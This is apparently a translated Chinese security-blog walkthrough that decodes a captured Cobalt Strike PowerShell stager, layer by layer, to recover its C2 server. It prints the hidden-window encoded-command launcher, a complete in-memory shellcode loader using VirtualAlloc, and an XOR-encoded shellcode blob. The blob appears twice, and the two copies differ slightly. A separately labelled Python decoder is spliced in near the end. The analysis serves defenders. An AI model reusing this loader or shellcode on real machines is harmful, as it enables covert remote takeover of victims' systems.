Decoding Obfuscated PowerShell Code - 皮卡丘

admin, 2021-12-31 15:12:42

Key points

  • Microsoft added several logging mechanisms to recent PowerShell versions, including Transcription and ScriptBlock logging, to record PowerShell activity. As a result, PowerShell-based attacks obfuscate and encode their code at run time.
  • First, let's look at PowerShell's "-EncodedCommand" parameter.
  • -EncodedCommand
    Accepts a base64-encoded string version of a command. Use this parameter
    to submit commands to Windows PowerShell that require complex quotation
    marks or curly braces.
  • As the usage note above says, "EncodedCommand" is a parameter meant to wrap complex strings so that PowerShell can run them from the command line. It can also be used to hide key strings in order to evade detection by protective software.
  • Know your enemy: let's look at how such a command is generated.

Understanding the CS (Cobalt Strike) PowerShell command

  • Generate the "powershell command" one-liner directly from CS.

  • The generated payload:

powershell -nop -w hidden -encodedcommand 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
  • This is CS's fileless delivery form: PowerShell loads the shellcode straight into memory and executes it. Breaking the command down step by step:
    • -nop => -NoProfile, do not load the PowerShell profile
    • -w hidden => -WindowStyle hidden, hide the console window
    • -encodedcommand => execute the base64-encoded string as a PowerShell command

Case study

  • During an HVV (护网) exercise the blue team captured the following code and needed to decode it to recover the address and port of the CS server it connects to:
%COMSPEC% /b /c start /b /min powershell -nop -w hidden -encodedcommand <base64-encoded command omitted>

Base64 decoding (1)

  • First base64 decode:
echo -n "需要解密的代码" | base64 -D

$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String("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"));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();

Base64 decoding (2)

  • Second base64 decode:
echo -n "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" | base64 -D

  • At first glance the result looks like binary data, possibly encrypted or compressed.
  • From the first base64 decode we can already see that the data was gzip-compressed and then base64-encoded:
    • ;IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();
  • It can also be recognised from the leading H4sIAAAAAAAAA, which usually indicates base64 + gzip.

Gzip decompression

  • Now decompress the data with gzip to recover the plaintext:
~ » echo -n "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" | base64 -D | gunzip
  • The plaintext of the PowerShell loader is as follows:
Set-StrictMode -Version 2
$DoIt = @'
function func_get_proc_address {
    Param ($var_module, $var_procedure)     
    $var_unsafe_native_methods = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
    $var_gpa = $var_unsafe_native_methods.GetMethod('GetProcAddress', [Type[]] @('System.Runtime.InteropServices.HandleRef', 'string'))
    return $var_gpa.Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($var_unsafe_native_methods.GetMethod('GetModuleHandle')).Invoke($null, @($var_module)))), $var_procedure))
}
function func_get_delegate_type {
    Param (
        [Parameter(Position = 0, Mandatory = $True)] [Type[]] $var_parameters,
        [Parameter(Position = 1)] [Type] $var_return_type = [Void]
    )
    $var_type_builder = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
    $var_type_builder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $var_parameters).SetImplementationFlags('Runtime, Managed')
    $var_type_builder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $var_return_type, $var_parameters).SetImplementationFlags('Runtime, Managed')
    return $var_type_builder.CreateType()
}
[Byte[]]$var_code = [System.Convert]::FromBase64String('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')
for ($x = 0; $x -lt $var_code.Count; $x++) {
    $var_code[$x] = $var_code[$x] -bxor 35
}
$var_va = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((func_get_proc_address kernel32.dll VirtualAlloc), (func_get_delegate_type @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))
$var_buffer = $var_va.Invoke([IntPtr]::Zero, $var_code.Length, 0x3000, 0x40)
[System.Runtime.InteropServices.Marshal]::Copy($var_code, 0, $var_buffer, $var_code.length)
$var_runme = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($var_buffer, (func_get_delegate_type @([IntPtr]) ([Void])))
$var_runme.Invoke([IntPtr]::Zero)
'@
If ([IntPtr]::size -eq 8) {
    start-job { param($a) IEX $a } -RunAs32 -Argument $DoIt | wait-job | Receive-Job
}
else {
    IEX $DoIt
}

Base64 decoding (3)

  • Continue decoding the following data:
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

  • The decoded content is garbage again. Looking back at the previous stage's output, we see that the bytes are encrypted with an XOR operation.

  • Run the script in PowerShell ISE to decode it:
[Byte[]]$var_code = [System.Convert]::FromBase64String('38uqIyMjQ6rGEvFHqHETqHEvqHE3qFELLJRpBRLcEuOPH0JfIQ8D4uwuIuTB03F0qHEzqGEfIvOoY1um41dpIvNzqGs7qHsDIvDAH2qoF6gi9RLcEuOP4uwuIuQbw1bXIF7bGF4HVsF7qHsHIvBFqC9oqHs/IvCoJ6gi86pnBwd4eEJ6eXLcw3t8eagxyKV+S01GVyNLVEpNSndLb1QFJNz2yyMjIyMS3HR0dHR0Sxl1WoTc9sqHIyMjeBLqcnJJIHJyS5giIyNwc0t0qrzl3PZzyq8jIyN4EvFxSyMR46dxcXFwcXNLyHYNGNz2quWg4HNLoxAjI6rDSSdzSTx1S1ZlvaXc9nwS3HR0SdxwdUsOJTtY3Pam4yyn6SIjIxLcptVXJ6rayCpLiebBftz2quJLZgJ9Etz2Etx0SSRydXNLlHTDKNz2nCMMIyMa5FYke3PKWNzc3BLcyrIiIyPK6iIjI8tM3NzcDGZ5dEUjSIgEoJKXg6X5qzPHl1iO1buG+VuC6rtpnoH41qg2+GNzdpA2TdUXolH+tJ/mUO65byu/dx/NX5qstEl/1PmpWeplO0fErSN2UEZRDmJERk1XGQNuTFlKT09CDBYNEwMLQExOU0JXSkFPRhgDbnBqZgMaDRMYA3RKTUdMVFADbXcDFQ0SGAN3UUpHRk1XDBYNExgDYWxqZhoYc3dhcQouKSP4VpuFSK7RM6YYoEWg5NP6S9kDRy7v1+9l6XvafZkG84FqmRudQNMHNVeEM9WPDUrPGzBH2tZZpMkasn6vGEqpNpUUjihiQnkd4eovJ5UwNNWBtXdWBhJ7ISLKZq6AwYNoC+D0hbjBx8myxeQl7sj9hecL1KkJuU2mb+lDhPXgV+QPHbyNyxgW2LAdGXKMGjAwRDJfHspTfpmzbTfjpGaZreF0vnnOmPUrC+QoYqNMVtUlkoRz/PZlPTWZ+1fLS6OregYTdGzqEFvmcEtE2vxec7qhtWIjS9OWgXXc9kljSyMzIyNLIyNjI3RLe4dwxtz2sJojIyMjIvpycKrEdEsjAyMjcHVLMbWqwdz2puNX5agkIuCm41bGe+DLqt7c3BIXGg0RGw0bEg0SGiMjIyMg')

for ($x = 0; $x -lt $var_code.Count; $x++) {
    $var_code[$x] = $var_code[$x] -bxor 35
}
  • Because this step involves XOR decoding, the PowerShell has to be debugged, which can be done in Microsoft's built-in ISE; the decoded variable is then piped to a text file for further processing. In brief, the steps are: decode the base64-encoded data, allocate memory and execute it (a fileless attack).

XOR key decoding

  • Take this block of data out and write it to disk with WriteAllBytes:
[Byte[]]$var_code = [System.Convert]::FromBase64String('38uqIyMjQ6rGEvFHqHETqHEvqHE3qFELLJRpBRLcEuOPH0JfIQ8D4uwuIuTB03F0qHEzqGEfIvOoY1um41dpIvNzqGs7qHsDIvDAH2qoF6gi9RLcEuOP4uwuIuQbw1bXIF7bGF4HVsF7qHsHIvBFqC9oqHs/IvCoJ6gi86pnBwd4eEJ6eXLcw3t8eagxyKV+S01GVyNLVEpNSndLb1QFJNz2yyMjIyMS3HR0dHR0Sxl1WoTc9sqHIyMjeBLqcnJJIHJyS5giIyNwc0t0qrzl3PZzyq8jIyN4EvFxSyMR46dxcXFwcXNLyHYNGNz2quWg4HNLoxAjI6rDSSdzSTx1S1ZlvaXc9nwS3HR0SdxwdUsOJTtY3Pam4yyn6SIjIxLcptVXJ6rayCpLiebBftz2quJgJ9Etz2Etx0SSRydXNLlHTDKNz2nCMMIyMa5FYke3PKWNzc3BLcyrIiIyPK6iIjI8tM3NzcDGZ5dEUjSIgEoJKXg6X5qzPHl1iO1buG+VuC6rtpnoH41qg2+GNzdpA2TdUXolH+tJ/mUO65byu/dx/NX5qstEl/1PmpWeplO0fErSN2UEZRDmJERk1XGQNuTFlKT09CDBYNEwMLQExOU0JXSkFPRhgDbnBqZgMaDRMYA3RKTUdMVFADbXcDFQ0SGAN3UUpHRk1XDBYNExgDYWxqZhoYc3dhcQouKSP4VpuFSK7RM6YYoEWg5NP6S9kDRy7v1+9l6XvafZkG84FqmRudQNMHNVeEM9WPDUrPGzBH2tZZpMkasn6vGEqpNpUUjihiQnkd4eovJ5UwNNWBtXdWBhJ7ISLKZq6AwYNoC+D0hbjBx8myxeQl7sj9hecL1KkJuU2mb+lDhPXgV+QPHbyNyxgW2LAdGXKMGjAwRDJfHspTfpmzbTfjpGaZreF0vnnOmPUrC+QoYqNMVtUlkoRz/PZlPTWZ+1fLS6OregYTdGzqEFvmcEtE2vxec7qhtWIjS9OWgXXc9kljSyMzIyNLIyNjI3RLe4dwxtz2sJojIyMjIvpycKrEdEsjAyMjcHVLMbWqwdz2puNX5agkIuCm41bGe+DLqt7c3BIXGg0RGw0bEg0SGiMjIyMg')

for ($x = 0; $x -lt $var_code.Count; $x++) {
    $var_code[$x] = $var_code[$x] -bxor 35
}

[System.IO.File]::WriteAllBytes("C:\test\old.txt", $var_code)

  • Run the .ps1 and inspect old.txt.
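The whole chain walked through above (UTF-16LE base64 -EncodedCommand, then gzip + base64, then XOR with 35) as one Python decoder. This is an added example, not the author's code; it runs on a constructed sample built in the same shape as the captured stager, and the function name decode_stager is an assumption.

```python
import base64
import gzip
import re

# Constructed sample, not the page's real capture: a stripped-down loader in the
# same three-layer shape (UTF-16LE base64 -> gzip+base64 -> XOR 35) as above.
SHELLCODE = bytes(range(64))                  # stand-in for the real shellcode
XOR_KEY = 35
LOADER = (
    "[Byte[]]$var_code = [System.Convert]::FromBase64String('%s')\n"
    "for ($x = 0; $x -lt $var_code.Count; $x++) {\n"
    "    $var_code[$x] = $var_code[$x] -bxor %d\n}\n"
    % (base64.b64encode(bytes(b ^ XOR_KEY for b in SHELLCODE)).decode(), XOR_KEY)
)
STUB = (
    '$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String("%s"));'
    "IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream("
    "$s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();"
    % base64.b64encode(gzip.compress(LOADER.encode())).decode()
)
ENCODED_COMMAND = base64.b64encode(STUB.encode("utf-16le")).decode()

B64_ARG = re.compile(r"FromBase64String\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)")


def decode_stager(cmdline: str) -> dict:
    """Peel the three layers off a captured command line (or a bare -EncodedCommand value)."""
    # Accept the common spellings -e / -ec / -enc / -encodedcommand; else treat input as bare base64.
    m = re.search(r"-e(?:ncodedcommand|nc|c)?\s+([A-Za-z0-9+/=]{16,})", cmdline, re.I)
    outer = m.group(1) if m else cmdline.strip()
    # Layer 1: -EncodedCommand carries base64 of the UTF-16LE script, which is why
    # a plain base64 -d shows an 'A' (NUL byte) after every character.
    stub = base64.b64decode(outer).decode("utf-16le")
    blob = base64.b64decode(B64_ARG.search(stub).group(1))
    # Layer 2: gzip magic 1f 8b is what appears as the leading 'H4sI' in base64.
    if not blob.startswith(b"\x1f\x8b"):
        raise ValueError("second layer is not gzip; expected a H4sI... blob")
    loader = gzip.decompress(blob).decode()
    # Layer 3: the loader XORs every byte of the embedded payload with a constant.
    key_m = re.search(r"-bxor\s+(\d+)", loader)
    key = int(key_m.group(1)) if key_m else 0      # 0 means no XOR layer present
    shellcode = bytes(b ^ key for b in base64.b64decode(B64_ARG.search(loader).group(1)))
    return {"stub": stub, "loader": loader, "xor_key": key, "shellcode": shellcode}


if __name__ == "__main__":
    result = decode_stager("powershell -nop -w hidden -encodedcommand " + ENCODED_COMMAND)
    print("xor key:", result["xor_key"], "payload bytes:", len(result["shellcode"]))
```

The returned shellcode is what the page writes to old.txt; on a real capture the C2 host and port are looked for in those decoded bytes.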


Source: 先知论坛

Original link: https://cn-sec.com/archives/710738.html